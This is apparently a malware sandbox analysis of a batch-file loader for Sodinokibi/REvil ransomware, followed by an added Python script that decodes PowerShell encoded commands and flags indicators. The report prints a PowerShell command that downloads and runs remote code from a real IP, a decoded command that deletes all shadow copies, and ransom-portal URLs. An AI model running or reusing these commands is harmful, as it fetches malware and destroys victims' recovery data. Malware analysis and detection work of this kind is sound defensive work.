Analysis

Max time kernel: 122s
Max time network: 63s
Platform: windows7_x64
Resource: win7v200430
Submitted: 02-06-2020 10:10

Static task: static1
Behavioral task: behavioral1
  Sample: 6d8087f6ec720945a32c8ee912884724.bat
  Resource: win7v200430
Behavioral task: behavioral2
  Sample: 6d8087f6ec720945a32c8ee912884724.bat
  Resource: win10v200430
General

Target: 6d8087f6ec720945a32c8ee912884724.bat
Size: 222B
MD5: f215a676b7ae355bb7b7d9288ef0cac1
SHA1: 86d732a573f84185b33555e496bcf0b86316f4ac
SHA256: 47ec07c77cf326da4daa229be123e052dd6dd66171a3b6fb323dce3240b7c7a8
SHA512: ec06287d161ea1fe6a44d215a0975a9a3b4570b2c3054e26041bfd6b31e29ef3e73652665a5d91f76cffdcc2b7972381028ac2c7be22a2437300624ea0d42438
Malware Config

Extracted (stage-2 download URL taken from the PowerShell command line):
  http://185.103.242.78/pastes/6d8087f6ec720945a32c8ee912884724

Extracted from C:\s9859-readme.txt (ransom note)
  Family: sodinokibi
  Victim portal URLs (Tor and clearnet, same victim identifier in the path):
  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B062B4B7ADC0CAC7
  http://decryptor.cc/B062B4B7ADC0CAC7
Signatures

Enumerates connected drives (3 TTPs)

Modifies service (2 TTPs, 4 IoCs)
Process: vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer  vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer  vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer  vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer  vssvc.exe
Drops file in Program Files directory (27 IoCs)
Process: powershell.exe (every entry below is attributed to powershell.exe)
  File opened for modification  \??\c:\program files\TestRestore.dotm
  File opened for modification  \??\c:\program files\FormatSkip.emz
  File opened for modification  \??\c:\program files\HidePublish.WTV
  File created                  \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\s9859-readme.txt
  File created                  \??\c:\program files (x86)\s9859-readme.txt
  File opened for modification  \??\c:\program files\SetUnprotect.rtf
  File opened for modification  \??\c:\program files\UnprotectDisable.wmf
  File opened for modification  \??\c:\program files\SubmitDismount.mpp
  File opened for modification  \??\c:\program files\TestCompress.jpeg
  File created                  \??\c:\program files\s9859-readme.txt
  File opened for modification  \??\c:\program files\AssertGroup.pot
  File opened for modification  \??\c:\program files\LockClose.wmf
  File opened for modification  \??\c:\program files\RevokeExpand.asx
  File opened for modification  \??\c:\program files\MountImport.mid
  File opened for modification  \??\c:\program files\ResumeStop.ADTS
  File opened for modification  \??\c:\program files\ResumeUse.wma
  File opened for modification  \??\c:\program files\SubmitPush.svgz
  File opened for modification  \??\c:\program files\BlockMount.vsd
  File created                  \??\c:\program files\microsoft sql server compact edition\s9859-readme.txt
  File opened for modification  \??\c:\program files\FormatUnlock.eps
  File opened for modification  \??\c:\program files\InstallRegister.dib
  File opened for modification  \??\c:\program files\ProtectConvert.ADTS
  File created                  \??\c:\program files\microsoft sql server compact edition\v3.5\s9859-readme.txt
  File opened for modification  \??\c:\program files\ConfirmSubmit.mpeg
  File opened for modification  \??\c:\program files\ConvertPop.mpg
  File opened for modification  \??\c:\program files\EnableStep.iso
  File opened for modification  \??\c:\program files\FindConvertFrom.wmx
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Process: powershell.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1ixm288ukl46j.bmp"  powershell.exe
Suspicious use of AdjustPrivilegeToken (7 IoCs)
Processes: powershell.exe, powershell.exe, vssvc.exe
  Token: SeDebugPrivilege          PID 1076  powershell.exe
  Token: SeDebugPrivilege          PID 1076  powershell.exe
  Token: SeDebugPrivilege          PID 756   powershell.exe
  Token: SeBackupPrivilege         PID 1640  vssvc.exe
  Token: SeRestorePrivilege        PID 1640  vssvc.exe
  Token: SeAuditPrivilege          PID 1640  vssvc.exe
  Token: SeTakeOwnershipPrivilege  PID 1076  powershell.exe
Suspicious behavior: EnumeratesProcesses (77 IoCs)
Processes: powershell.exe, powershell.exe
  PID 1076  powershell.exe  (repeated hits; every entry in the list other than the two below)
  PID 756   powershell.exe  (2 hits)
Blacklisted process makes network request (1 IoC)
Process: powershell.exe
  Flow 5  PID 1076  powershell.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
Process: powershell.exe
  PID 1076  powershell.exe
Suspicious use of WriteProcessMemory (5 IoCs)
Processes: cmd.exe, powershell.exe
  PID 740 wrote to memory of 1076   740   cmd.exe         target: powershell.exe
  PID 1076 wrote to memory of 756   1076  powershell.exe  target: powershell.exe
  PID 1076 wrote to memory of 756   1076  powershell.exe  target: powershell.exe
  PID 1076 wrote to memory of 756   1076  powershell.exe  target: powershell.exe
  PID 1076 wrote to memory of 756   1076  powershell.exe  target: powershell.exe
Family: Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Processes

1. C:\Windows\system32\cmd.exe (PID 740)
   cmd /c "C:\Users\Admin\AppData\Local\Temp\6d8087f6ec720945a32c8ee912884724.bat"
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1076, child of 740)
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/6d8087f6ec720945a32c8ee912884724');Invoke-DHFGQQVRIHKXEIL;Start-Sleep -s 10000"
      The 222-byte batch file is only a loader: it starts the 32-bit (SysWOW64) PowerShell, which fetches the stage-2 script from the paste URL, evaluates it in memory with IEX without writing it to disk, calls Invoke-DHFGQQVRIHKXEIL (a function the downloaded script must define, since it is not a built-in cmdlet) and then sleeps for 10000 seconds, which keeps PID 1076 alive while the file modifications and wallpaper change attributed to it above take place.
      - Drops file in Program Files directory
      - Sets desktop wallpaper using registry
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
      - Blacklisted process makes network request
      - Suspicious behavior: CmdExeWriteProcessMemorySpam
      - Suspicious use of WriteProcessMemory

      3. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 756, child of 1076)
         powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
         The -e (-EncodedCommand) argument is Base64 over the UTF-16LE bytes of the script, not UTF-8; it decodes to Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} which deletes every volume shadow copy through WMI so that files cannot be restored after encryption. The vssvc.exe process (PID 1640) below, its SeBackupPrivilege/SeRestorePrivilege use and the VSS\Diag writer keys listed under "Modifies service" are consistent with the VSS service being driven by this call.
         - Suspicious use of AdjustPrivilegeToken
         - Suspicious behavior: EnumeratesProcesses

1. C:\Windows\system32\vssvc.exe (PID 1640)
   C:\Windows\system32\vssvc.exe
   - Modifies service
   - Suspicious use of AdjustPrivilegeToken
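Added triage helper for the process tree above; it is not part of the sandbox report and not code from the sample. It takes the three command lines from the tree as constructed input, pulls out the -EncodedCommand argument (any prefix form such as -e or -enc, which powershell.exe accepts), decodes it as Base64 over UTF-16LE, and flags the IEX download cradle and the WMI shadow-copy deletion. The indicator patterns and the switch-prefix handling are this example's own, not the sandbox's signatures.

```python
"""Decode powershell.exe -EncodedCommand payloads and flag the behaviours
seen in this process tree (IEX download cradle, WMI shadow-copy deletion).
Added example; not part of the sandbox report or the sample."""
import base64
import binascii
import re
from typing import List, Optional

# Command lines copied from the process tree on this page; constructed input
# for this example, ordered cmd.exe -> powershell.exe (1076) -> powershell.exe (756).
COMMAND_LINES = [
    r'cmd /c "C:\Users\Admin\AppData\Local\Temp\6d8087f6ec720945a32c8ee912884724.bat"',
    r'''C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/6d8087f6ec720945a32c8ee912884724');Invoke-DHFGQQVRIHKXEIL;Start-Sleep -s 10000"''',
    "powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==",
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
# The set is built from the full word rather than a wildcard so that -ex... (ExecutionPolicy)
# is not mistaken for it; its argument ("Bypass") is valid Base64 text.
ENCODED_PREFIXES = {"encodedcommand"[:i] for i in range(1, len("encodedcommand") + 1)}

# Behaviours to flag (this example's own patterns); matched against the decoded command
# when one is present, otherwise against the raw command line.
INDICATORS = [
    ("download_cradle", re.compile(r"(?i)Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest")),
    ("invoke_expression", re.compile(r"(?i)\bIEX\b|Invoke-Expression")),
    ("shadowcopy_deletion", re.compile(r"(?i)Win32_Shadowcopy|vssadmin.*delete\s+shadows|wmic.*shadowcopy\s+delete")),
]
URL_RE = re.compile(r"https?://[^\s'\"()]+")


def extract_encoded_blob(cmdline: str) -> Optional[str]:
    """Return the Base64 argument that follows an -EncodedCommand-style switch, if any."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.startswith(("-", "/")) and tok[1:].lower() in ENCODED_PREFIXES:
            return tokens[i + 1].strip("\"'")
    return None


def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand is Base64 over the UTF-16LE bytes of the script, not UTF-8."""
    raw = base64.b64decode(blob, validate=True)
    return raw.decode("utf-16-le").rstrip("\x00")


def analyse(cmdline: str) -> dict:
    """Decode any encoded payload, then run the indicator patterns over the effective command."""
    blob = extract_encoded_blob(cmdline)
    decoded: Optional[str] = None
    findings: List[str] = []
    if blob is not None:
        try:
            decoded = decode_encoded_command(blob)
        except (binascii.Error, UnicodeDecodeError):
            findings.append("undecodable_encoded_command")
    effective = decoded if decoded is not None else cmdline
    findings += [name for name, pattern in INDICATORS if pattern.search(effective)]
    return {
        "cmdline": cmdline,
        "decoded": decoded,
        "findings": findings,
        "urls": URL_RE.findall(effective),
    }


def triage(cmdlines: List[str]) -> List[dict]:
    return [analyse(c) for c in cmdlines]


if __name__ == "__main__":
    for result in triage(COMMAND_LINES):
        print(result["cmdline"][:60] + "...", "findings:", result["findings"])
        if result["decoded"] is not None:
            print("  decoded:", result["decoded"])
        for url in result["urls"]:
            print("  url:", url)
```

Run against the page's three command lines it reports nothing for cmd.exe, the download cradle plus IEX and the paste URL for PID 1076, and the decoded shadow-copy deletion for PID 756. Decoding with utf-8 instead of utf-16-le is the usual mistake here and yields a string of interleaved NULs that no pattern matches.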